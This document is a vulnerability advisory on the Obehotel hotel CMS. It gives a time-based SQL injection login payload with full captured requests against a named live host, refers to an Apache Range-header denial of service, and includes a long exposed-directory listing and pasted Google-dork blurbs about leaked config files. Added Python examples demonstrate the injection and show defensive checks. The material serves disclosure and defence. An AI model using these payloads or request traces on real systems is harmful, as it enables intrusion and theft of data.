Obehotel CMS Denial Of Service / SQL Injection

Posted Aug 26, 2013
Authored by Juan Carlos Garcia

Obehotel CMS suffers from denial of service, insecure transit, directory listing, and remote SQL injection vulnerabilities.

tags | exploit, remote, denial of service, vulnerability, sql injection
SHA-256 | d5574eb95b9c81f907d0fcbec02ac11f615600255a8fae6dcf88f94ba7394837

OBEHOTEL (Spanish) CMS Blind SQL injection / Apache httpd Remote Denial of Service / Directory Listing / Insecure transition from HTTPS to HTTP in form post

I-VULNERABILITY
-------------------------

#Title: OBEHOTEL CMS Blind SQL injection / Apache httpd Remote Denial of Service / Directory Listing / Insecure transition from HTTPS to HTTP in form post

#Vendor: https://secureadv.obehotel.com/mpa/

#Author: Juan Carlos García (@secnight)

#Follow me

http://www.highsec.es
http://hackingmadrid.blogspot.com
Twitter:@secnight



II-Introduction:
================

Obehotel is a set of solutions, technological developments and applications directed at hotels for online marketing
and distribution, aimed at improving both hoteliers' processes and the customer experience.

Obehotel is the result of a joint effort by professionals with extensive experience in the ICT sector (Efimatica)
and marketing professionals from the travel and tourism sector (Holidaysinspain.com, its main online distribution partner).

This union places them among the major Spanish companies specialising in online distribution technology applied to the hospitality industry.

-------------------------

III-PROOF OF CONCEPT
====================


Attack details
--------------

Blind SqlInjection
******************

SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input.

An SQL injection occurs when a web application accepts user input that is placed directly into a SQL statement without
properly filtering out dangerous characters.

An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.

Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker.

It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases,
it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.

Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions).

If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.



Attack details
--------------

URL-encoded POST input username was set to:

xlgskuot' or (sleep(2)+1) limit 1 --

POST /mpa/index.php


Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: ./hotel_inicio/index.php
Vary: Accept-Encoding
Content-Length: 3402
Keep-Alive: timeout=15, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


password=g00dPa$$w0rD&username=xlgskuot%27%20or%20%28sleep%282%29%2b1%29%20limit%201%20--%20

Variant (1):

POST /mpa/index.php HTTP/1.1
Content-Length: 92
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=sto2bv4krb2h4f0n45tm6o4hn3
Host: secureadv.obehotel.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

password=g00dPa$$w0rD&username=xlgskuot%27%20or%20%28sleep%282%29%2b1%29%20limit%201%20--%20
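The following is an added example, not code from the advisory or from Obehotel, showing why the captured payload works against a string-built login query and why a parameterised query neutralises it. It assumes an in-memory SQLite database with a Python function registered under the name sleep() to stand in for MySQL's SLEEP(); the users table, its contents and SLEEP_SCALE are constructed for the demo.

```python
import sqlite3
import time
from urllib.parse import parse_qs

# Exact POST body captured in the advisory; the username field carries the payload.
CAPTURED_BODY = ("password=g00dPa$$w0rD&username="
                 "xlgskuot%27%20or%20%28sleep%282%29%2b1%29%20limit%201%20--%20")

SLEEP_SCALE = 0.1   # emulation only: sleep(2) pauses 0.2 s here instead of 2 s
sleep_calls = []    # every emulated SLEEP() invocation is recorded here

def emulated_sleep(seconds):
    """Stand-in for MySQL SLEEP(): pauses, then returns 0 like the real function."""
    sleep_calls.append(seconds)
    time.sleep(seconds * SLEEP_SCALE)
    return 0

def make_db():
    """Constructed demo database: one user row plus the sleep() stand-in."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("sleep", 1, emulated_sleep)
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'constructed-secret')")
    return conn

def login_vulnerable(conn, username, password):
    """String-built query: the quote in the payload closes the literal, the rest
    (or (sleep(2)+1) limit 1 --) becomes SQL and comments out the password check."""
    sql = ("SELECT id, username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone()

def login_fixed(conn, username, password):
    """Bound parameters: the whole payload is compared as one username string."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()

def run(login):
    """Replays the captured body through one login function.
    Returns (matched_row, number_of_sleep_calls, elapsed_seconds)."""
    form = parse_qs(CAPTURED_BODY)   # percent-decodes %27 -> ', %28 -> (, %2b -> +
    username, password = form["username"][0], form["password"][0]
    conn = make_db()
    del sleep_calls[:]
    start = time.monotonic()
    row = login(conn, username, password)
    return row, len(sleep_calls), time.monotonic() - start

if __name__ == "__main__":
    for name, fn in (("vulnerable", login_vulnerable), ("fixed", login_fixed)):
        row, sleeps, secs = run(fn)
        print("%-10s row=%s sleep() calls=%d elapsed=%.2fs" % (name, row, sleeps, secs))
```

The vulnerable path both pauses (the time-based signal the scanner measured) and returns the first user row regardless of password; the parameterised path calls sleep() zero times and returns no row.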



Apache httpd Remote Denial of Service
*************************************


A denial of service vulnerability has been found in the way the multiple overlapping ranges
are handled by the Apache HTTPD server:

http://seclists.org/fulldisclosure/2011/Aug/175

CVE-2011-3192

An attack tool is circulating in the wild. Active use of this tool has been observed.

The attack can be done remotely and with a modest number of requests can cause very significant memory and CPU usage on the server.


Affected Apache versions: 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19.

Current version is: 2.2.16
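An added example, not from the advisory or the Apache project: a request filter that does what the published CVE-2011-3192 workaround did in configuration, namely strip a Range header that carries many byte-range specs, and additionally flags inverted or overlapping ranges. MAX_RANGES and the sample headers are constructed for the demo.

```python
import re

MAX_RANGES = 5   # constructed threshold for the number of byte-range specs accepted

_SPEC = re.compile(r"^(\d*)-(\d*)$")

def parse_byte_ranges(header):
    """Parses 'bytes=a-b,c-,-d' into (start, end) tuples. end=None is open-ended,
    start=None is a suffix range. Returns None when the header is malformed."""
    if header is None:
        return []
    unit, sep, specs = header.partition("=")
    if not sep or unit.strip().lower() != "bytes":
        return None
    ranges = []
    for spec in specs.split(","):
        spec = spec.strip()
        m = _SPEC.match(spec)
        if not m or spec == "-":
            return None
        start, end = m.group(1), m.group(2)
        ranges.append((int(start) if start else None, int(end) if end else None))
    return ranges

def range_header_verdict(header):
    """Returns (action, reason). 'strip' means: serve the request as if it had no
    Range header at all, rather than refusing it, so legitimate clients still get
    a full response."""
    ranges = parse_byte_ranges(header)
    if ranges is None:
        return ("strip", "malformed")
    if len(ranges) > MAX_RANGES:
        return ("strip", "too many ranges (%d)" % len(ranges))
    absolute = sorted((s, e) for s, e in ranges if s is not None and e is not None)
    for s, e in absolute:
        if s > e:
            return ("strip", "inverted range %d-%d" % (s, e))
    for (s1, e1), (s2, e2) in zip(absolute, absolute[1:]):
        if s2 <= e1:
            return ("strip", "overlapping ranges")
    return ("allow", "ok")

if __name__ == "__main__":
    # Constructed samples: a normal resume request, a two-part request, and the
    # many-overlapping-ranges shape the CVE describes.
    for h in ("bytes=0-499", "bytes=0-499,500-999", "bytes=0-,5-0,5-1,5-2,5-3,5-4"):
        print("%-35s -> %s" % (h, range_header_verdict(h)))
```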


Directory Listing
*****************

The web server is configured to display the list of files contained in this directory.
This is not recommended because the directory may contain files that are not normally
exposed through links on the web site. A user can view a list of all files from this
directory, possibly exposing sensitive information.

Affected items (226):
/mpa/core
/mpa/core/ajax
/mpa/core/ajax/blog
/mpa/core/ajax/newsfeed
/mpa/core/class
/mpa/core/css
/mpa/core/css/plugins
/mpa/core/fonts
/mpa/core/images
/mpa/core/images/assets
/mpa/core/images/assets/thumb
/mpa/core/images/assets/thumb/large
/mpa/core/images/assets/thumb/medium
/mpa/core/images/assets/thumb/small
/mpa/core/images/blueline
/mpa/core/images/colorbox
/mpa/core/images/colorpicker
/mpa/core/images/contrast
/mpa/core/images/default
/mpa/core/images/greenline
/mpa/core/images/headerbg
/mpa/core/images/icons
/mpa/core/images/icons/64
/mpa/core/images/icons/blogperfume
/mpa/core/images/icons/blogperfume/Advertisment
/mpa/core/images/icons/blogperfume/Archive
/mpa/core/images/icons/blogperfume/Article
/mpa/core/images/icons/blogperfume/Author
/mpa/core/images/icons/blogperfume/Blog%20Roll
/mpa/core/images/icons/blogperfume/Comments
/mpa/core/images/icons/blogperfume/Date
/mpa/core/images/icons/blogperfume/Email
/mpa/core/images/icons/blogperfume/Plugins
/mpa/core/images/icons/blogperfume/RSS
/mpa/core/images/icons/blogperfume/Themes
/mpa/core/images/icons/blogperfume/Views
/mpa/core/images/icons_actions
/mpa/core/images/kozers
/mpa/core/images/kozers/original
/mpa/core/images/kozers/thumb
/mpa/core/images/loaders
/mpa/core/images/markers
/mpa/core/images/preview
/mpa/core/images/thumbs
/mpa/core/images/uniform
/mpa/core/js
/mpa/core/js/custom
/mpa/core/js/lang
/mpa/core/js/plugins
/mpa/core/js/plugins/ckfinder
/mpa/core/js/plugins/ckfinder/_samples/php
/mpa/core/js/plugins/ckfinder/core
/mpa/core/js/plugins/ckfinder/core/connector
/mpa/core/js/plugins/ckfinder/core/connector/php
/mpa/core/js/plugins/ckfinder/core/connector/php/lang
/mpa/core/js/plugins/ckfinder/core/connector/php/php5
/mpa/core/js/plugins/ckfinder/core/connector/php/php5/CommandHandler
/mpa/core/js/plugins/ckfinder/core/connector/php/php5/Core
/mpa/core/js/plugins/ckfinder/core/connector/php/php5/ErrorHandler
/mpa/core/js/plugins/ckfinder/core/connector/php/php5/Utils
/mpa/core/js/plugins/ckfinder/help
/mpa/core/js/plugins/ckfinder/help/cs/files
/mpa/core/js/plugins/ckfinder/help/en/files
/mpa/core/js/plugins/ckfinder/help/es/files
/mpa/core/js/plugins/ckfinder/help/es/files/images
/mpa/core/js/plugins/ckfinder/help/es-mx/files
/mpa/core/js/plugins/ckfinder/help/es-mx/files/images
/mpa/core/js/plugins/ckfinder/help/fi/files
/mpa/core/js/plugins/ckfinder/help/fi/files/images
/mpa/core/js/plugins/ckfinder/help/files
/mpa/core/js/plugins/ckfinder/help/files/images
/mpa/core/js/plugins/ckfinder/help/files/other
/mpa/core/js/plugins/ckfinder/help/lt/files
/mpa/core/js/plugins/ckfinder/help/lt/files/images
/mpa/core/js/plugins/ckfinder/help/pl/files
/mpa/core/js/plugins/ckfinder/lang
/mpa/core/js/plugins/ckfinder/plugins
/mpa/core/js/plugins/ckfinder/plugins/dummy
/mpa/core/js/plugins/ckfinder/plugins/dummy/lang
/mpa/core/js/plugins/ckfinder/plugins/fileeditor
/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror
/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/lib
/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/mode
/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/mode/clike
/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/mode/css
/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/mode/htmlmixed
/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/mode/javascript
/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/mode/php
/mpa/core/js/plugins/ckfinder/plugins/fileeditor/codemirror/mode/xml
/mpa/core/js/plugins/ckfinder/plugins/flashupload
/mpa/core/js/plugins/ckfinder/plugins/flashupload/flash
/mpa/core/js/plugins/ckfinder/plugins/gallery
/mpa/core/js/plugins/ckfinder/plugins/gallery/colorbox
/mpa/core/js/plugins/ckfinder/plugins/gallery/colorbox/images
/mpa/core/js/plugins/ckfinder/plugins/gallery/colorbox/images/ie6
/mpa/core/js/plugins/ckfinder/plugins/imageresize
/mpa/core/js/plugins/ckfinder/plugins/imageresize/images
/mpa/core/js/plugins/ckfinder/plugins/watermark
/mpa/core/js/plugins/ckfinder/plugins/zip
/mpa/core/js/plugins/ckfinder/plugins/zip/images
/mpa/core/js/plugins/ckfinder/skins
/mpa/core/js/plugins/ckfinder/skins/kama
/mpa/core/js/plugins/ckfinder/skins/kama/images
/mpa/core/js/plugins/ckfinder/skins/kama/images/icons
/mpa/core/js/plugins/ckfinder/skins/kama/images/icons/16
/mpa/core/js/plugins/ckfinder/skins/kama/images/icons/32
/mpa/core/js/plugins/ckfinder/skins/kama/images/loaders
/mpa/core/js/plugins/ckfinder/skins/kama/images/toolbar
/mpa/core/js/plugins/ckfinder/skins/v1
/mpa/core/js/plugins/ckfinder/skins/v1/images
/mpa/core/js/plugins/ckfinder/skins/v1/images/icons
/mpa/core/js/plugins/ckfinder/skins/v1/images/icons/16
/mpa/core/js/plugins/ckfinder/skins/v1/images/icons/32
/mpa/core/js/plugins/ckfinder/skins/v1/images/loaders
/mpa/core/js/plugins/ckfinder/skins/v1/images/toolbar
/mpa/core/js/plugins/ckfinder/userfiles
/mpa/core/js/plugins/tinymce
/mpa/core/js/plugins/tinymce/langs
/mpa/core/js/plugins/tinymce/plugins
/mpa/core/js/plugins/tinymce/plugins/advhr
/mpa/core/js/plugins/tinymce/plugins/advhr/css
/mpa/core/js/plugins/tinymce/plugins/advhr/js
/mpa/core/js/plugins/tinymce/plugins/advhr/langs
/mpa/core/js/plugins/tinymce/plugins/advimage
/mpa/core/js/plugins/tinymce/plugins/advimage/css
/mpa/core/js/plugins/tinymce/plugins/advimage/img
/mpa/core/js/plugins/tinymce/plugins/advimage/js
/mpa/core/js/plugins/tinymce/plugins/advimage/langs
/mpa/core/js/plugins/tinymce/plugins/advlink
/mpa/core/js/plugins/tinymce/plugins/advlink/css
/mpa/core/js/plugins/tinymce/plugins/advlink/js
/mpa/core/js/plugins/tinymce/plugins/advlink/langs
/mpa/core/js/plugins/tinymce/plugins/advlist
/mpa/core/js/plugins/tinymce/plugins/autolink
/mpa/core/js/plugins/tinymce/plugins/autoresize
/mpa/core/js/plugins/tinymce/plugins/autosave
/mpa/core/js/plugins/tinymce/plugins/autosave/langs
/mpa/core/js/plugins/tinymce/plugins/bbcode
/mpa/core/js/plugins/tinymce/plugins/contextmenu
/mpa/core/js/plugins/tinymce/plugins/directionality
/mpa/core/js/plugins/tinymce/plugins/emotions
/mpa/core/js/plugins/tinymce/plugins/emotions/img
/mpa/core/js/plugins/tinymce/plugins/emotions/js
/mpa/core/js/plugins/tinymce/plugins/emotions/langs
/mpa/core/js/plugins/tinymce/plugins/example
/mpa/core/js/plugins/tinymce/plugins/example/img
/mpa/core/js/plugins/tinymce/plugins/example/js
/mpa/core/js/plugins/tinymce/plugins/example/langs
/mpa/core/js/plugins/tinymce/plugins/example_dependency
/mpa/core/js/plugins/tinymce/plugins/fullpage
/mpa/core/js/plugins/tinymce/plugins/fullpage/css
/mpa/core/js/plugins/tinymce/plugins/fullpage/js
/mpa/core/js/plugins/tinymce/plugins/fullpage/langs
/mpa/core/js/plugins/tinymce/plugins/fullscreen
/mpa/core/js/plugins/tinymce/plugins/iespell
/mpa/core/js/plugins/tinymce/plugins/inlinepopups
/mpa/core/js/plugins/tinymce/plugins/inlinepopups/skins
/mpa/core/js/plugins/tinymce/plugins/inlinepopups/skins/clearlooks2
/mpa/core/js/plugins/tinymce/plugins/inlinepopups/skins/clearlooks2/img
/mpa/core/js/plugins/tinymce/plugins/inlinepopups/skins/themepixels
/mpa/core/js/plugins/tinymce/plugins/inlinepopups/skins/themepixels/img
/mpa/core/js/plugins/tinymce/plugins/insertdatetime
/mpa/core/js/plugins/tinymce/plugins/layer
/mpa/core/js/plugins/tinymce/plugins/legacyoutput
/mpa/core/js/plugins/tinymce/plugins/lists
/mpa/core/js/plugins/tinymce/plugins/media
/mpa/core/js/plugins/tinymce/plugins/media/css
/mpa/core/js/plugins/tinymce/plugins/media/js
/mpa/core/js/plugins/tinymce/plugins/media/langs
/mpa/core/js/plugins/tinymce/plugins/nonbreaking
/mpa/core/js/plugins/tinymce/plugins/noneditable
/mpa/core/js/plugins/tinymce/plugins/pagebreak
/mpa/core/js/plugins/tinymce/plugins/paste
/mpa/core/js/plugins/tinymce/plugins/paste/js
/mpa/core/js/plugins/tinymce/plugins/paste/langs
/mpa/core/js/plugins/tinymce/plugins/preview
/mpa/core/js/plugins/tinymce/plugins/preview/jscripts
/mpa/core/js/plugins/tinymce/plugins/print
/mpa/core/js/plugins/tinymce/plugins/save
/mpa/core/js/plugins/tinymce/plugins/searchreplace
/mpa/core/js/plugins/tinymce/plugins/searchreplace/css
/mpa/core/js/plugins/tinymce/plugins/searchreplace/js
/mpa/core/js/plugins/tinymce/plugins/searchreplace/langs
/mpa/core/js/plugins/tinymce/plugins/spellchecker
/mpa/core/js/plugins/tinymce/plugins/spellchecker/css
/mpa/core/js/plugins/tinymce/plugins/spellchecker/img
/mpa/core/js/plugins/tinymce/plugins/style
/mpa/core/js/plugins/tinymce/plugins/style/css
/mpa/core/js/plugins/tinymce/plugins/style/js
/mpa/core/js/plugins/tinymce/plugins/style/langs
/mpa/core/js/plugins/tinymce/plugins/tabfocus
/mpa/core/js/plugins/tinymce/plugins/table
/mpa/core/js/plugins/tinymce/plugins/table/css
/mpa/core/js/plugins/tinymce/plugins/table/js
/mpa/core/js/plugins/tinymce/plugins/table/langs
/mpa/core/js/plugins/tinymce/plugins/template
/mpa/core/js/plugins/tinymce/plugins/template/css
/mpa/core/js/plugins/tinymce/plugins/template/js
/mpa/core/js/plugins/tinymce/plugins/template/langs
/mpa/core/js/plugins/tinymce/plugins/visualblocks
/mpa/core/js/plugins/tinymce/plugins/visualblocks/css
/mpa/core/js/plugins/tinymce/plugins/visualchars
/mpa/core/js/plugins/tinymce/plugins/wordcount
/mpa/core/js/plugins/tinymce/themes
/mpa/core/js/plugins/tinymce/themes/advanced
/mpa/core/js/plugins/tinymce/themes/advanced/img
/mpa/core/js/plugins/tinymce/themes/advanced/js
/mpa/core/js/plugins/tinymce/themes/advanced/langs
/mpa/core/js/plugins/tinymce/themes/advanced/skins
/mpa/core/js/plugins/tinymce/themes/advanced/skins/default
/mpa/core/js/plugins/tinymce/themes/advanced/skins/default/img
/mpa/core/js/plugins/tinymce/themes/advanced/skins/highcontrast
/mpa/core/js/plugins/tinymce/themes/advanced/skins/o2k7
/mpa/core/js/plugins/tinymce/themes/advanced/skins/o2k7/img
/mpa/core/js/plugins/tinymce/themes/advanced/skins/themepixels
/mpa/core/js/plugins/tinymce/themes/advanced/skins/themepixels/img
/mpa/core/js/plugins/tinymce/themes/simple
/mpa/core/js/plugins/tinymce/themes/simple/img
/mpa/core/js/plugins/tinymce/themes/simple/langs
/mpa/core/js/plugins/tinymce/themes/simple/skins
/mpa/core/js/plugins/tinymce/themes/simple/skins/default
/mpa/core/js/plugins/tinymce/themes/simple/skins/o2k7
/mpa/core/js/plugins/tinymce/themes/simple/skins/o2k7/img
/mpa/core/js/plugins/tinymce/utils
/mpa/core/lang
/mpa/core/pdf


Files uploaded through FTP

Affected items

/mpa/core/js/plugins/ckfinder/core/connector/php/php5/CommandHandler
/mpa/core/js/plugins/ckfinder/core/connector/php/php5/ErrorHandler
/mpa/core/js/plugins/ckfinder/help/files/images
/mpa/core/js/plugins/ckfinder/plugins
/mpa/core/js/plugins/ckfinder/plugins/flashupload
/mpa/core/js/plugins/ckfinder/plugins/flashupload/flash



Mp3 file


Yes! I probably should have told you guys earlier,
but this is how I've been getting 100% of my mp3s. It fricken rocks, use it and abuse it. Downfalls to it...

a) sometimes you shouldn't include mp3 in the query, and getting what you want takes several different methods of searching
b) a lot of the time Google gives you results and they are not there, thanks to good old friend 404
c) finding stuff takes a lot of practice.

Goods...

a) I've found whole albums
b) I've mass downloaded directories of hundreds of songs that I have an interest in
c) it's exciting seeing the results, like finding treasure.

Affected items

/mpa/core/js/plugins/ckfinder/skins/kama/images/icons/16
/mpa/core/js/plugins/ckfinder/skins/kama/images/icons/32
/mpa/core/js/plugins/ckfinder/skins/v1/images/icons/16
/mpa/core/js/plugins/ckfinder/skins/v1/images/icons/32



PHP configuration file (config.php)


This search brings up sites with "config.php" files. To skip the technical discussion,
this configuration file contains both a username and a password for an SQL database.
Most sites with forums run a PHP message base. This file gives you the keys to that forum,
including FULL ADMIN access to the database. Way to go, googleDorks!!

Affected items

/mpa/core/js/plugins/ckfinder
/mpa/core/js/plugins/ckfinder/core/connector/php/php5/Core


Insecure transition from HTTPS to HTTP in form post
***************************************************
This secure (https) page contains a form that is posting to an insecure (http) page.
This could confuse users who may think their data is encrypted when in fact it's not.

This vulnerability affects

/mpa/core/js/plugins/ckfinder/help/es/files/suggestions.html.

Attack details
--------------

Form name: ""

Form action: "http://cksource.com/ckfinder/doc_suggestion"

GET /mpa/core/js/plugins/ckfinder/help/es/files/suggestions.html

Referer: https://secureadv.obehotel.com/mpa/core/js/plugins/ckfinder/help/es/files/toc.html

Cookie: PHPSESSID=sto2bv4krb2h4f0n45tm6o4hn3

Host: secureadv.obehotel.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

Accept: */*

Response:

Server: Apache/2.2.16 (Debian)
Last-Modified: Fri, 24 Aug 2012 02:49:24 GMT

ETag: "30119b-696-4c7fa060b5500"

Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1686
Keep-Alive: timeout=15, max=29
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-15
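An added example, not from the advisory or from Obehotel, of the check behind this finding: parse a page served over https and report every form whose resolved action would submit over plain http. The sample HTML is constructed; the page URL and the form action are the ones the advisory reports.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

PAGE_URL = ("https://secureadv.obehotel.com/mpa/core/js/plugins/ckfinder/help/es/"
            "files/suggestions.html")

# Constructed page: the reported form, a relative-action form, and a form with no action.
SAMPLE_HTML = """<html><body>
<form name="" action="http://cksource.com/ckfinder/doc_suggestion" method="post">
  <textarea name="text"></textarea><input type="submit">
</form>
<form action="/mpa/index.php" method="post"><input name="q"></form>
<form method="post"><input name="nothing"></form>
</body></html>"""

class FormCollector(HTMLParser):
    """Collects (name, action) for every <form> start tag."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            a = dict(attrs)
            self.forms.append((a.get("name") or "", a.get("action")))

def insecure_form_posts(page_url, html):
    """Returns [(form_name, absolute_action)] for forms on an https page whose
    action resolves to http. A missing or empty action posts back to the page
    itself, so it inherits the page's scheme and is not reported."""
    if urlsplit(page_url).scheme != "https":
        return []
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for name, action in parser.forms:
        target = urljoin(page_url, action or "")
        if urlsplit(target).scheme == "http":
            findings.append((name, target))
    return findings

if __name__ == "__main__":
    for name, target in insecure_form_posts(PAGE_URL, SAMPLE_HTML):
        print('Form name: "%s" posts over http to %s' % (name, target))
```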


IV. CREDITS
-------------------------

This vulnerability has been discovered
by Juan Carlos García (@secnight)

Special thanks to Javier Garcia Garcia for showing me this Spanish "CMS" for Penetration Testing

V. LEGAL NOTICES
-------------------------

The Author accepts no responsibility for any damage
caused by the use or misuse of this information.